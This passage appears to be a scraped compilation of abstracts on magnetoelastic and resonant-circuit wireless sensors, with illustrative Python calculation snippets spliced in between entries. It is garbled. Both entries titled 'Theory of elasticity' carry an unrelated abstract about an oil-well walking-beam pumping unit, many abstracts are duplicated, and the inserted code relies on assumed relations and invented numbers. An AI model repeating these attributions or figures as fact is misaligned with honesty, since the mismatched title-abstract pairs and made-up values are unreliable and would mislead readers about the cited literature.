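dm = 1e-9                                                  # added mass, kg (1 microgram, illustrative)
df = -f0 * dm / (2.0 * m0)

print(f"unloaded resonance f0 = {f0/1e3:.1f} kHz")
print(f"mass load {dm*1e9:.2f} micrograms -> shift {df:.2f} Hz")
```

Because the shift scales with the fractional added mass, thin chemically responsive coatings of the kind described above (TiO2, pH-responsive polymers) translate small analyte-induced mass changes into resolvable frequency changes.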
--- paper_title: A wireless micro-sensor for simultaneous measurement of pH, temperature, and pressure paper_content: In response to a magnetic field impulse, magnetostrictive magnetoelastic sensors mechanically vibrate. These vibrations can be detected in several ways: optically from the amplitude modulation of a reflected laser beam, acoustically using a microphone or hydrophone, and by using a pickup coil to detect the magnetic flux emitted from the sensor. Earlier work has shown that the resonant frequency of a magnetoelastic sensor shifts in response to different environmental parameters, including temperature, pressure, fluid flow velocity and mass loading, with each parameter determined in an otherwise constant environment. To extend the utility of the sensor technology in this work we report on the fabrication and application of a miniaturized array of four magnetoelastic sensors that enable the simultaneous remote query measurement of pH, temperature, and pressure from a passive, wireless platform. --- paper_title: Magnetoelastic Immunosensors: Amplified Mass Immunosorbent Assay for Detection of Escherichia coli O157:H7 paper_content: A mass-sensitive magnetoelastic immunosensor for detection of Escherichia coli O157:H7 is described, based on immobilization of affinity-purified antibodies attached to the surface of a micrometer-scale magnetoelastic cantilever. Alkaline phosphatase is used as a labeled enzyme to the anti-E. coli O157:H7 antibody, amplifying the mass change associated with the antibody−antigen binding reaction by biocatalytic precipitation of 5-bromo-4-chloro-3-indolyl phosphate in a pH 10.0 PBS solution. The detection limit of the biosensor is 102 E. coli O157:H7 cells/mL. A linear change in the resonance frequency of the biosensor was found to E. coli O157:H7 concentrations ranging from 102 to 106 cells/mL. --- paper_title: A remote query magnetostrictive viscosity sensor. paper_content: Magnetically soft, magnetostrictive metallic glass ribbons are used as in-situ remote query viscosity sensors. When immersed in a liquid, changes in the resonant frequency of the ribbon-like sensors are shown to correlate with the square root of the liquid viscosity and density product. An elastic wave model is presented that describes the sensor response as a function of the frictional forces acting upon the sensor surface. --- paper_title: Measurement of temperature and liquid viscosity using wireless magneto-acoustic/magneto-optical sensors paper_content: Remote query magneto-acoustic and magneto-optical sensors are used to measure liquid temperature, viscosity and density. Sensors comprising magnetoelastic Metglas(R) 2826MB thick-films, alloy composition Fe/sub 40/Ni/sub 38/Mo/sub 4/B/sub 18/, oscillate in response to an externally applied, time-varying magnetic field. The sensor oscillations are strongest at the characteristic mechanical resonant frequency of the sensor. Depending upon the physical geometry and surface roughness of the magnetoelastic films, the mechanical sensor-vibrations launch an acoustic wave that can be detected remotely using a hydrophone or microphone. Furthermore, the sensor oscillations act to modulate the intensity of a laser beam reflected from the sensor surface. The sensor vibrations were optically monitored using a photo detector placed in the path of a laser beam back-scattered off the sensor ribbon. 
Using a Fast Fourier Transform, the signal obtained in the time-domain from acoustical or optical detectors is converted into the frequency-domain from which the resonant frequency of the sensor is determined. The resonant frequency shifts linearly with temperature and, when immersed in a liquid, with the frictional damping forces associated with liquid viscosity and density, thus allowing a remote measurement of temperature and liquid viscosity. --- paper_title: A wireless, remote query glucose biosensor based on a pH-sensitive polymer paper_content: This paper describes a wireless, remote query glucose biosensor using a ribbonlike, mass-sensitive magnetoelastic sensor as the transducer. The glucose biosensor is fabricated by first coating the magnetoelastic sensor with a pH-sensitive polymer and upon it a layer of glucose oxidase (GOx). The pH-responsive polymer swells or shrinks, thereby changing mass, respectively, in response to increasing or decreasing pH values. The GOx-catalyzed oxidation of glucose produces gluconic acid, inducing the pH-responsive polymer to shrink, which in turn decreases the polymer mass. In response to a time-varying magnetic field, a magnetoelastic sensor mechanically vibrates at a characteristic resonance frequency, the value of which inversely depends on sensor mass loading. As the magnetoelastic films are magnetostrictive, the vibrations launch magnetic flux that can be remotely detected using a pickup coil. Hence, changes in the resonance frequency of a passive magnetoelastic transducer are detected on a remote query ... --- paper_title: Theory of elasticity paper_content: A walking beam pumping unit is provided for pumping liquid from wells having gas pressure therein. The unit is driven by gas pressure from the well reciprocating the piston of a pneumatic cylinder up and down to swing the walking beam correspondingly and pump the liquid from the well. Gas under pressure is directed from the wellhead through a two-way valve to the opposite ends of the hydraulic cylinder in alternating fashion, so the piston has power strokes in opposite directions. Each power stroke, besides moving the walking beam, serves to recompress the gas used for the preceding power stroke sufficiently to inject it into the sales line. The setting of the two-way valve is controlled by a pneumatic actuator supplied with gas under pressure from the wellhead and having a thimble valve responsive to the up and down movement of the walking beam by means of adjustable stops carried thereon. The horsehead is counter-balanced by weights or by a pneumatic cylinder attached to the horsehead and actuated by movement thereof to provide counter-balancing gas pressure. In one form of the invention, the counter-balancing gas pressure is stored in a hollow skid assembly. --- paper_title: A magnetoelastic bioaffinity-based sensor for avidin. paper_content: Abstract A magnetoelastic bioaffinity sensor coupled with biocatalytic precipitation is described for avidin detection. The non-specific adsorption characteristics of streptavidin on different functionalized sensor surfaces are examined. It is found that a biotinylated poly(ethylene glycol) (PEG) interface can effectively block non-specific adsorption of proteins. Coupled with the PEG immobilized sensor surface, alkaline phosphatase (AP) labeled streptavidin is used to track specific binding on the sensor. 
This mass-change-based signal is amplified by the accumulation on the sensor of insoluble products of 5-bromo-4-chloro-3-indolyl phosphate catalyzed by AP. The resulting mass loading on the sensor surface in turn shifts the resonance frequency of the magnetoelastic sensors, with an avidin detection limit of approximately 200 ng/ml. --- paper_title: Elastic modulus measurement of thin films coated onto magnetoelastic ribbons paper_content: A model is presented to describe the change of the resonant frequency of a magnetoelastic sensor when the sensor is coated with a material of given elasticity. With a mass load coated on the surface of the sensor, its characteristic resonant frequency changes depending on the ratio of the sound velocities in the sensor and the coating. A measurement technique is derived that allows the determination of Young's modulus of elasticity of thin film coatings, with thickness greater than approximately 75 nm, based on the measurement of mass and resonant frequency of a sensor before and after coating. Comparing the measurement to the model delivers the value of Young's modulus of elasticity for a coating of known density. --- paper_title: Remote query measurement of pressure, fluid-flow velocity, and humidity using magnetoelastic thick-film sensors paper_content: Abstract Free-standing magnetoelastic thick-film sensors have a characteristic resonant frequency that can be determined by monitoring the magnetic flux emitted from the sensor in response to a time varying magnetic field. This property allows the sensors to be monitored remotely without the use of direct physical connections, such as wires, enabling measurement of environmental parameters from within sealed, opaque containers. In this work, we report on application of magnetoelastic sensors to measurement of atmospheric pressure, fluid-flow velocity, temperature, and mass load. Mass loading effects are demonstrated by fabrication of a remote query humidity sensor, made by coating the magnetoelastic thick film with a thin layer of solgel deposited Al 2 O 3 that reversibly changes mass in response to humidity. --- paper_title: Simultaneous measurement of liquid density and viscosity using remote query magnetoelastic sensors paper_content: Earlier work [C. A. Grimes et al., Smart Mater. Struct. 8, 639, (1999)] has shown that upon immersion in liquid the resonant frequency of a magnetoelasticsensor shifts linearly in response to the square root of the liquid density and viscosity product. It is shown that comparison between a pair of magnetoelasticsensors with different degrees of surface roughness can be used to simultaneously determine the liquid density and viscosity. --- paper_title: Magnetoacoustic remote query temperature and humidity sensors paper_content: In response to an externally applied time-varying magnetic field, freestanding sensors made of magnetoelastic thick or thin films mechanically oscillate. These oscillations are strongest at the characteristic resonant frequency of the sensor. Depending upon the physical geometry and the surface roughness of the magnetoelastic sensor, these mechanical deformations launch an acoustic wave that can be detected remotely from the test area by a microphone. By monitoring changes in the characteristic resonant frequency of a magnetoacoustic sensor, multiple environmental parameters can be measured. 
In this work we report on the application of magnetoacoustic sensors for the remote query measurement of temperature, the monitoring of phase transitions and, in combination with a humidity-responsive mass-changing Al2O3 ceramic thin film, the in situ measurement of humidity levels. --- paper_title: A staphylococcal enterotoxin B magnetoelastic immunosensor. paper_content: A magnetoelastic immunosensor for detection of staphylococcal enterotoxin B (SEB) is described. The magnetoelastic sensor is a newly developed mass/elasticity-based transducer of high sensitivity having a material cost of approximately $0.001/sensor. Affinity-purified rabbit anti-SEB antibody was covalently immobilized on magnetoelastic sensors, of dimensions 6 mm x 2 mm x 28 microm. The affinity reaction of biotin-avidin and biocatalytic precipitation are used to amplify antigen-antibody binding events on the sensor surface. Horseradish peroxidase (HRP) and alkaline phosphatase were examined as the labeled enzymes to induce biocatalytic precipitation. The alkaline phosphatase substrate, 5-bromo-4-chloro-3-indolyl phosphate (BCIP) produces a dimer, which binds tightly to the sensor surface, inducing a change in sensor resonance frequency. The biosensor demonstrates a linear shift in resonance frequency with staphylococcal enterotoxin B concentration between 0.5 and 5 ng/ml, with a detection limit of 0.5 ng/ml. --- paper_title: A wireless magnetoelastic micro-sensor array for simultaneous measurement of temperature and pressure paper_content: Magnetoelastic thick film sensors mechanically deform when subjected to a magnetic field impulse, launching elastic waves within the sensor the magnitude of which is greatest at the mechanical resonant frequency. As the sensors are magnetostrictive, the mechanical deformations launch magnetic flux that can be detected remotely. The characteristic resonant frequency of a magnetoelastic sensor, which is a function of the length, density, elasticity and Poisson's ratio of the sensor material, changes in response to temperature, pressure, ambient flow rate and, in combination with a mass changing, chemically responsive layer different analyte concentrations. By using an array of such sensors different environmental parameters can be simultaneously determined in a complex environment; we have designed and fabricated such an array for the simultaneous measurement of temperature and pressure. --- paper_title: A wireless, remote query ammonia sensor. paper_content: Abstract This paper presents a wireless, remote query ammonia sensor comprised of a free-standing magnetoelastic thick-film coated with a polymer, poly(acrylic acid-co-isooctylacrylate), that changes mass in response to atmospheric ammonia concentration. The mass of the polymer layer modulates the resonant frequency the ferromagnetic magnetoelastic substrate, hence by monitoring the frequency response of the sensor, atmospheric NH 3 concentration can be determined remotely, without the need for physical connections to the sensor or specific alignment requirements. The effect of copolymer composition, polymer film thickness, and relative humidity level (RH) on the sensitivity of the sensor were investigated. The sensor linearly tracks ammonia concentration below 0.8 vol.%, and tracks higher concentrations logarithmically; within the linear calibration range, a 0.02 vol.% change in NH 3 concentration can be detected. 
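Several of the chemical and biological sensor abstracts above (for example the ammonia and enterotoxin B sensors) report a linear resonance-frequency response over a stated calibration range. The sketch below shows one plausible way such a calibration could be handled in practice: fit a straight line to frequency shift versus known analyte concentration, then invert it for an unknown sample. The data values and ranges are invented for illustration and are not taken from the cited work.

```python
# Sketch of a linear calibration for a coated magnetoelastic chemical sensor:
# fit resonance-frequency shift vs. known analyte concentration, then invert
# the fit to estimate an unknown concentration. Data values are illustrative.
import numpy as np

# Calibration data (assumed): concentration in vol.% and measured shift in Hz
conc = np.array([0.0, 0.2, 0.4, 0.6, 0.8])               # analyte concentration, vol.%
shift = np.array([0.0, -55.0, -108.0, -161.0, -215.0])   # resonance shift, Hz

slope, intercept = np.polyfit(conc, shift, 1)            # least-squares line

def concentration_from_shift(df_hz: float) -> float:
    """Invert the linear calibration to estimate concentration from a shift."""
    return (df_hz - intercept) / slope

measured_shift = -130.0                                   # Hz, from an unknown sample
print(f"calibration slope: {slope:.1f} Hz per vol.%")
print(f"estimated concentration: {concentration_from_shift(measured_shift):.2f} vol.%")
```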
--- paper_title: Design and application of a wireless, passive, resonant-circuit environmental monitoring sensor paper_content: Abstract A wireless, passive, remote query sensor platform is presented capable of monitoring the complex permittivity of a surrounding medium, temperature, humidity, and pressure. The sensor is a planar two-dimensional inductor–capacitor circuit, of scaleable-size, that resonates at a characteristic frequency the value of which is dependent upon the parameters of interest. The resonant frequency of the sensor is detected remotely with one or a pair of loop antennas by measuring the impedance or voltage spectrum of the antenna(s), with the environmental parameters of interest then calculated from the measured resonant frequency. The wireless, remote query nature of the platform enables the LC sensor to monitor the environmental conditions from within sealed opaque containers. The paper describes the operational principles, design criteria, illustrative applications, and performance limitations of the sensor platform. --- paper_title: A remote query magnetostrictive viscosity sensor. paper_content: Magnetically soft, magnetostrictive metallic glass ribbons are used as in-situ remote query viscosity sensors. When immersed in a liquid, changes in the resonant frequency of the ribbon-like sensors are shown to correlate with the square root of the liquid viscosity and density product. An elastic wave model is presented that describes the sensor response as a function of the frictional forces acting upon the sensor surface. --- paper_title: Measurement of temperature and liquid viscosity using wireless magneto-acoustic/magneto-optical sensors paper_content: Remote query magneto-acoustic and magneto-optical sensors are used to measure liquid temperature, viscosity and density. Sensors comprising magnetoelastic Metglas(R) 2826MB thick-films, alloy composition Fe/sub 40/Ni/sub 38/Mo/sub 4/B/sub 18/, oscillate in response to an externally applied, time-varying magnetic field. The sensor oscillations are strongest at the characteristic mechanical resonant frequency of the sensor. Depending upon the physical geometry and surface roughness of the magnetoelastic films, the mechanical sensor-vibrations launch an acoustic wave that can be detected remotely using a hydrophone or microphone. Furthermore, the sensor oscillations act to modulate the intensity of a laser beam reflected from the sensor surface. The sensor vibrations were optically monitored using a photo detector placed in the path of a laser beam back-scattered off the sensor ribbon. Using a Fast Fourier Transform, the signal obtained in the time-domain from acoustical or optical detectors is converted into the frequency-domain from which the resonant frequency of the sensor is determined. The resonant frequency shifts linearly with temperature and, when immersed in a liquid, with the frictional damping forces associated with liquid viscosity and density, thus allowing a remote measurement of temperature and liquid viscosity. --- paper_title: Correction for longitudinal mode vibration in thin slender beams paper_content: This letter reports on a correction to the theoretical prediction of longitudinal mode vibration in thin, slender beams. Thin magnetostrictive strips were fashioned from Metglas™ and subjected to a modulated magnetic field to determine resonant frequency and acoustic wave propagation speed. The results indicated that current analytical solutions were not adequate to predict behavior. 
Numerical simulations were performed that adjusted Poisson’s ratio until the acoustic wave speed matched that measured in the experiments. The results indicated that the current equations, formulated using the plane-strain modulus, should be modified by using the plane-stress or biaxial modulus. --- paper_title: Remote query measurement of pressure, fluid-flow velocity, and humidity using magnetoelastic thick-film sensors paper_content: Abstract Free-standing magnetoelastic thick-film sensors have a characteristic resonant frequency that can be determined by monitoring the magnetic flux emitted from the sensor in response to a time varying magnetic field. This property allows the sensors to be monitored remotely without the use of direct physical connections, such as wires, enabling measurement of environmental parameters from within sealed, opaque containers. In this work, we report on application of magnetoelastic sensors to measurement of atmospheric pressure, fluid-flow velocity, temperature, and mass load. Mass loading effects are demonstrated by fabrication of a remote query humidity sensor, made by coating the magnetoelastic thick film with a thin layer of solgel deposited Al 2 O 3 that reversibly changes mass in response to humidity. --- paper_title: Simultaneous measurement of liquid density and viscosity using remote query magnetoelastic sensors paper_content: Earlier work [C. A. Grimes et al., Smart Mater. Struct. 8, 639, (1999)] has shown that upon immersion in liquid the resonant frequency of a magnetoelasticsensor shifts linearly in response to the square root of the liquid density and viscosity product. It is shown that comparison between a pair of magnetoelasticsensors with different degrees of surface roughness can be used to simultaneously determine the liquid density and viscosity. --- paper_title: Magnetoacoustic remote query temperature and humidity sensors paper_content: In response to an externally applied time-varying magnetic field, freestanding sensors made of magnetoelastic thick or thin films mechanically oscillate. These oscillations are strongest at the characteristic resonant frequency of the sensor. Depending upon the physical geometry and the surface roughness of the magnetoelastic sensor, these mechanical deformations launch an acoustic wave that can be detected remotely from the test area by a microphone. By monitoring changes in the characteristic resonant frequency of a magnetoacoustic sensor, multiple environmental parameters can be measured. In this work we report on the application of magnetoacoustic sensors for the remote query measurement of temperature, the monitoring of phase transitions and, in combination with a humidity-responsive mass-changing Al2O3 ceramic thin film, the in situ measurement of humidity levels. --- paper_title: Magnetomechanical damping in amorphous ribbons with uniaxial anisotropy paper_content: We have investigated the magnetomechanical damping and the resonant amplitude of the longitudinal vibrations of amorphous ribbons with a uniaxial anisotropy induced transverse to the ribbon axis by magnetic field annealing. The damping and herewith the resonant amplitude are governed by eddy current losses. Yet, classical eddy current theory fails to describe the experimental results, in particular, when the sample is biased by a constant magnetic field. This failure ultimately originates in the commonly used assumption of an isotropic permeability tensor. 
This is not true in uniaxial ferromagnets where magnetization changes by rotation. Thus, within a domain, a change of magnetization along the ribbon axis is inevitably accompanied by a change of magnetization transverse to the ribbon axis. The latter produces excess eddy current losses which become increasingly important the more the equilibrium position of the magnetization vector is declined towards the ribbon axis by the bias field. Taking this into account, a straight forward calculation ends up in analytic expressions capable to describe correctly the experimental findings starting from the basic material parameters. --- paper_title: A wireless magnetoelastic micro-sensor array for simultaneous measurement of temperature and pressure paper_content: Magnetoelastic thick film sensors mechanically deform when subjected to a magnetic field impulse, launching elastic waves within the sensor the magnitude of which is greatest at the mechanical resonant frequency. As the sensors are magnetostrictive, the mechanical deformations launch magnetic flux that can be detected remotely. The characteristic resonant frequency of a magnetoelastic sensor, which is a function of the length, density, elasticity and Poisson's ratio of the sensor material, changes in response to temperature, pressure, ambient flow rate and, in combination with a mass changing, chemically responsive layer different analyte concentrations. By using an array of such sensors different environmental parameters can be simultaneously determined in a complex environment; we have designed and fabricated such an array for the simultaneous measurement of temperature and pressure. --- paper_title: Design and application of a wireless, passive, resonant-circuit environmental monitoring sensor paper_content: Abstract A wireless, passive, remote query sensor platform is presented capable of monitoring the complex permittivity of a surrounding medium, temperature, humidity, and pressure. The sensor is a planar two-dimensional inductor–capacitor circuit, of scaleable-size, that resonates at a characteristic frequency the value of which is dependent upon the parameters of interest. The resonant frequency of the sensor is detected remotely with one or a pair of loop antennas by measuring the impedance or voltage spectrum of the antenna(s), with the environmental parameters of interest then calculated from the measured resonant frequency. The wireless, remote query nature of the platform enables the LC sensor to monitor the environmental conditions from within sealed opaque containers. The paper describes the operational principles, design criteria, illustrative applications, and performance limitations of the sensor platform. --- paper_title: Characterization of nano-dimensional thin-film elastic moduli using magnetoelastic sensors paper_content: Abstract Application of magnetoelastic thick-film sensors to the measurement of thin-film elastic moduli is described in this study. An analytical model is derived, that relates the resonant frequency of a magnetoelastic sensor to the elasticity and density of an applied thin-film. Limits of the model are analyzed, and related to experimental measurements using thin-films of silver and aluminum. For 500 nm thick-films, the measured Young’s modulus of elasticity for Al and Ag is found to be within 1.6% of standard data. Using commercially available magnetoelastic sensors, the elasticity of coatings, approximately 30 nm thick, can readily be measured. 
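The thin-film elasticity abstracts above describe extracting a coating's Young's modulus from the sensor mass and resonance frequency measured before and after coating, with the shift depending on the ratio of the sound velocities in sensor and coating. The sketch below uses one hedged first-order form of that idea, (f1 - f0)/f0 ~ (dm/2M)(vc^2/vs^2 - 1), which reduces to the pure mass-loading shift when the coating is compliant and to zero shift when the coating matches the substrate; the exact model and its validity limits are given in the cited papers, and both the relation and every numerical value here are assumptions for illustration only.

```python
# Sketch: estimating a thin-film coating's Young's modulus from the resonance
# frequency of a magnetoelastic ribbon measured before (f0) and after (f1)
# coating, using an assumed first-order relation
#   (f1 - f0)/f0 ~= (dm / 2M) * (vc^2/vs^2 - 1),
# with plane-stress acoustic velocities v = sqrt(E / (rho * (1 - nu^2))).
# The relation and all numerical values are illustrative assumptions.
from math import sqrt

# Substrate (sensor) properties -- assumed
E_s, rho_s, nu_s = 105e9, 7900.0, 0.33
v_s = sqrt(E_s / (rho_s * (1.0 - nu_s**2)))

# Measured quantities -- assumed example numbers
M = 2.65e-6     # sensor mass before coating, kg
dm = 5.0e-8     # added coating mass, kg
f0 = 320.0e3    # resonance before coating, Hz
f1 = 319.2e3    # resonance after coating, Hz

rho_c, nu_c = 2700.0, 0.35   # coating density and Poisson's ratio (assumed known)

# Invert the first-order relation for the coating's velocity ratio, then E
ratio = ((f1 - f0) / f0) * (2.0 * M / dm) + 1.0   # = vc^2 / vs^2
E_c = ratio * v_s**2 * rho_c * (1.0 - nu_c**2)

print(f"estimated coating Young's modulus: {E_c/1e9:.1f} GPa")
```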
--- paper_title: Theory of elasticity paper_content: A walking beam pumping unit is provided for pumping liquid from wells having gas pressure therein. The unit is driven by gas pressure from the well reciprocating the piston of a pneumatic cylinder up and down to swing the walking beam correspondingly and pump the liquid from the well. Gas under pressure is directed from the wellhead through a two-way valve to the opposite ends of the hydraulic cylinder in alternating fashion, so the piston has power strokes in opposite directions. Each power stroke, besides moving the walking beam, serves to recompress the gas used for the preceding power stroke sufficiently to inject it into the sales line. The setting of the two-way valve is controlled by a pneumatic actuator supplied with gas under pressure from the wellhead and having a thimble valve responsive to the up and down movement of the walking beam by means of adjustable stops carried thereon. The horsehead is counter-balanced by weights or by a pneumatic cylinder attached to the horsehead and actuated by movement thereof to provide counter-balancing gas pressure. In one form of the invention, the counter-balancing gas pressure is stored in a hollow skid assembly. --- paper_title: Elastic modulus measurement of thin films coated onto magnetoelastic ribbons paper_content: A model is presented to describe the change of the resonant frequency of a magnetoelastic sensor when the sensor is coated with a material of given elasticity. With a mass load coated on the surface of the sensor, its characteristic resonant frequency changes depending on the ratio of the sound velocities in the sensor and the coating. A measurement technique is derived that allows the determination of Young's modulus of elasticity of thin film coatings, with thickness greater than approximately 75 nm, based on the measurement of mass and resonant frequency of a sensor before and after coating. Comparing the measurement to the model delivers the value of Young's modulus of elasticity for a coating of known density. --- paper_title: Characterization of nano-dimensional thin-film elastic moduli using magnetoelastic sensors paper_content: Abstract Application of magnetoelastic thick-film sensors to the measurement of thin-film elastic moduli is described in this study. An analytical model is derived, that relates the resonant frequency of a magnetoelastic sensor to the elasticity and density of an applied thin-film. Limits of the model are analyzed, and related to experimental measurements using thin-films of silver and aluminum. For 500 nm thick-films, the measured Young’s modulus of elasticity for Al and Ag is found to be within 1.6% of standard data. Using commercially available magnetoelastic sensors, the elasticity of coatings, approximately 30 nm thick, can readily be measured. --- paper_title: Monitoring blood coagulation with magnetoelastic sensors. paper_content: The determination of blood coagulation time is an essential part of monitoring therapeutic anticoagulants. Standard methodologies for the measurement of blood clotting time require dedicated personnel and involve blood sampling procedures. A new method based on magnetoelastic sensors has been employed for the monitoring of blood coagulation. The ribbon-like magnetoelastic sensor oscillates at a fundamental frequency, which shifts linearly in response to applied mass loads or a fixed mass load of changing elasticity. 
The magnetoelastic sensors emit magnetic flux, which can be detected by a remotely located pick-up coil, so that no direct physical connections are required. During blood coagulation, the viscosity of blood changes due to the formation of a soft fibrin clot. In turn, this change in viscosity shifts the characteristic resonance frequency of the magnetoelastic sensor enabling real-time continuous monitoring of this biological event. By monitoring the signal output as a function of time, a distinct blood clotting profile can be seen. The relatively low cost of the magnetoelastic ribbons enables their use as disposable sensors. This, along with the reduced volume of blood required, make the magnetoelastic sensors well suited for at-home and point-of-care testing devices. --- paper_title: Time domain characterization of oscillating sensors: Application of frequency counting to resonance frequency determination paper_content: A frequency counting technique is described for determining the resonance frequency of a transiently excited sensor; the technique is applicable to any sensor platform where the characteristic resonance frequency is the parameter of interest. The sensor is interrogated by a pulse-like excitation signal, and the resonance frequency of the sensor subsequently determined by counting the number of oscillations per time during sensor ring-down. A repetitive time domain interrogation technique is implemented to overcome the effects of sensor damping, such as that associated with mass loading, which reduces the duration of the sensor ring-down and hence the measurement resolution. The microcontroller based, transient frequency counting technique is detailed with application to the monitoring of magnetoelastic sensors [C. A. Grimes, D. Kouzoudis, and C. Mungle, Rev. Sci. Instrum. 71, 3822 (2000)], with a measurement resolution of 0.001% achieved in approximately 40 ms. --- paper_title: Frequency-domain characterization of magnetoelastic sensors: a microcontroller-based instrument for spectrum analysis using a threshold-crossing counting technique paper_content: This work presents a novel instrumentation technique for frequency-domain characterization of magnetoelastic sensors. By applying threshold-crossing counting to the transient response of a magnetoelastic sensor excited by sinusoidal pulses, frequency-domain analysis is accomplished without the necessity of using lock-in amplifier or FFT facilities as required in the conventional instrumentation techniques. The threshold-crossing counting technique is discussed and its electronic implementation described. The resulting compact and cost-effective microcontroller-based instrument is capable of frequency-domain analysis, and time-domain analysis including frequency counting and determination of the damping ratio. --- paper_title: A wireless micro-sensor for simultaneous measurement of pH, temperature, and pressure paper_content: In response to a magnetic field impulse, magnetostrictive magnetoelastic sensors mechanically vibrate. These vibrations can be detected in several ways: optically from the amplitude modulation of a reflected laser beam, acoustically using a microphone or hydrophone, and by using a pickup coil to detect the magnetic flux emitted from the sensor. 
Earlier work has shown that the resonant frequency of a magnetoelastic sensor shifts in response to different environmental parameters, including temperature, pressure, fluid flow velocity and mass loading, with each parameter determined in an otherwise constant environment. To extend the utility of the sensor technology in this work we report on the fabrication and application of a miniaturized array of four magnetoelastic sensors that enable the simultaneous remote query measurement of pH, temperature, and pressure from a passive, wireless platform. --- paper_title: Magnetic field tuning of the frequency–temperature response of a magnetoelastic sensor paper_content: Abstract Earlier work has shown that the resonant frequency of a magnetoelastic sensor shifts linearly in response to temperature [Sens. Actuat. A 84 (2000) 205]. In this work it is shown that over the temperature range examined, 20–60 °C, the temperature–frequency response is dependent upon the magnitude of an applied DC magnetic biasing field, and can be switched from negative, through zero, to positive. Experimental results are compared with a theoretical model that describes the effects of temperature and applied DC magnetic field on both the mechanical and magnetoelastic properties of the sensor material. --- paper_title: The frequency response of magnetoelastic sensors to stress and atmospheric pressure paper_content: Earlier work demonstrated that the characteristic resonant frequency of magnetoelastic thick-film sensors shifts linearly downwards in response to increasing atmospheric pressure. In this paper, the response mechanism is detailed and shown to be a function of both pressure and the way that the sensor is mechanically stressed. Stressing the sensor, in either the elastic or plastic regime, induces out-of-plane vibrations that act as a pressure-dependent damping force to the longitudinal sensor oscillations excited by the interrogation field. This damping force, in turn, acts to shift the resonant frequency of the magnetoelastic sensor lower in response to increasing pressure. --- paper_title: Remote query pressure measurement using magnetoelastic sensors paper_content: Two magnetostriction-based methods for measuring atmospheric pressure are presented. Each technique correlates changes in pressure with the characteristic resonant frequency of a magnetoelastic magnetostrictive thick-film sensor. In each case the sensor is monitored remotely, using an adjacently located pickup coil, without the use of physical connections to the sensor. --- paper_title: Magnetoelastic sensors in combination with nanometer-scale honeycombed thin film ceramic TiO2 for remote query measurement of humidity. paper_content: Ribbonlike magnetoelastic sensors can be considered the magnetic analog of an acoustic bell; in response to an externally applied magnetic field impulse the sensors emit magnetic flux with a characteristic resonant frequency. The magnetic flux can be detected external to the test area using a pick-up coil, enabling query remote monitoring of the sensor. The characteristic resonant frequency of a magnetoelastic sensor changes in response to mass loads. [L.D. Landau and E. M. Lifshitz, Theory of Elasticity, 3rd ed. (Pergamon, New York, 1986). p. 100].Therefore, remote query chemical sensors can be fabricated by combining the magnetoelastic sensors with a mass changing, chemically responsive layer. 
In this work magnetoelastic sensors are coated with humidity-sensitive thin films of ceramic, nanodimensionally porous TiO2 to make remote query humidity sensors. --- paper_title: Higher-order harmonics of a magnetically soft sensor: Application to remote query temperature measurement paper_content: This letter describes the application of magnetically soft ribbons for remote query temperature monitoring based upon amplitude changes in the higher-order harmonics emitted by the sensor in response to a magnetic interrogation signal. The harmonic-based temperature sensor is placed, or rigidly embedded since there are no moving parts, within the region of interest where it is remotely monitored using a single interrogation and detection coil. Taking the amplitude ratio between two or more different-order harmonics eliminates the effect of relative orientation between the sensor and monitoring coil, enabling wide-area monitoring. Remote query monitoring of temperature from within a concrete block is demonstrated. The wireless and passive nature of the described sensor platform makes it ideally suited for long-term monitoring applications, such as measuring the temperature inside a concrete roadway or building structure. --- paper_title: A wireless micro-sensor for simultaneous measurement of pH, temperature, and pressure paper_content: In response to a magnetic field impulse, magnetostrictive magnetoelastic sensors mechanically vibrate. These vibrations can be detected in several ways: optically from the amplitude modulation of a reflected laser beam, acoustically using a microphone or hydrophone, and by using a pickup coil to detect the magnetic flux emitted from the sensor. Earlier work has shown that the resonant frequency of a magnetoelastic sensor shifts in response to different environmental parameters, including temperature, pressure, fluid flow velocity and mass loading, with each parameter determined in an otherwise constant environment. To extend the utility of the sensor technology in this work we report on the fabrication and application of a miniaturized array of four magnetoelastic sensors that enable the simultaneous remote query measurement of pH, temperature, and pressure from a passive, wireless platform. --- paper_title: Measurement of temperature and liquid viscosity using wireless magneto-acoustic/magneto-optical sensors paper_content: Remote query magneto-acoustic and magneto-optical sensors are used to measure liquid temperature, viscosity and density. Sensors comprising magnetoelastic Metglas(R) 2826MB thick-films, alloy composition Fe40Ni38Mo4B18, oscillate in response to an externally applied, time-varying magnetic field. The sensor oscillations are strongest at the characteristic mechanical resonant frequency of the sensor. Depending upon the physical geometry and surface roughness of the magnetoelastic films, the mechanical sensor-vibrations launch an acoustic wave that can be detected remotely using a hydrophone or microphone. Furthermore, the sensor oscillations act to modulate the intensity of a laser beam reflected from the sensor surface. The sensor vibrations were optically monitored using a photo detector placed in the path of a laser beam back-scattered off the sensor ribbon. Using a Fast Fourier Transform, the signal obtained in the time-domain from acoustical or optical detectors is converted into the frequency-domain from which the resonant frequency of the sensor is determined.
The resonant frequency shifts linearly with temperature and, when immersed in a liquid, with the frictional damping forces associated with liquid viscosity and density, thus allowing a remote measurement of temperature and liquid viscosity. --- paper_title: Magnetoacoustic remote query temperature and humidity sensors paper_content: In response to an externally applied time-varying magnetic field, freestanding sensors made of magnetoelastic thick or thin films mechanically oscillate. These oscillations are strongest at the characteristic resonant frequency of the sensor. Depending upon the physical geometry and the surface roughness of the magnetoelastic sensor, these mechanical deformations launch an acoustic wave that can be detected remotely from the test area by a microphone. By monitoring changes in the characteristic resonant frequency of a magnetoacoustic sensor, multiple environmental parameters can be measured. In this work we report on the application of magnetoacoustic sensors for the remote query measurement of temperature, the monitoring of phase transitions and, in combination with a humidity-responsive mass-changing Al2O3 ceramic thin film, the in situ measurement of humidity levels. --- paper_title: A wireless magnetoelastic micro-sensor array for simultaneous measurement of temperature and pressure paper_content: Magnetoelastic thick film sensors mechanically deform when subjected to a magnetic field impulse, launching elastic waves within the sensor the magnitude of which is greatest at the mechanical resonant frequency. As the sensors are magnetostrictive, the mechanical deformations launch magnetic flux that can be detected remotely. The characteristic resonant frequency of a magnetoelastic sensor, which is a function of the length, density, elasticity and Poisson's ratio of the sensor material, changes in response to temperature, pressure, ambient flow rate and, in combination with a mass changing, chemically responsive layer different analyte concentrations. By using an array of such sensors different environmental parameters can be simultaneously determined in a complex environment; we have designed and fabricated such an array for the simultaneous measurement of temperature and pressure. --- paper_title: Magnetic field tuning of the frequency–temperature response of a magnetoelastic sensor paper_content: Abstract Earlier work has shown that the resonant frequency of a magnetoelastic sensor shifts linearly in response to temperature [Sens. Actuat. A 84 (2000) 205]. In this work it is shown that over the temperature range examined, 20–60 °C, the temperature–frequency response is dependent upon the magnitude of an applied DC magnetic biasing field, and 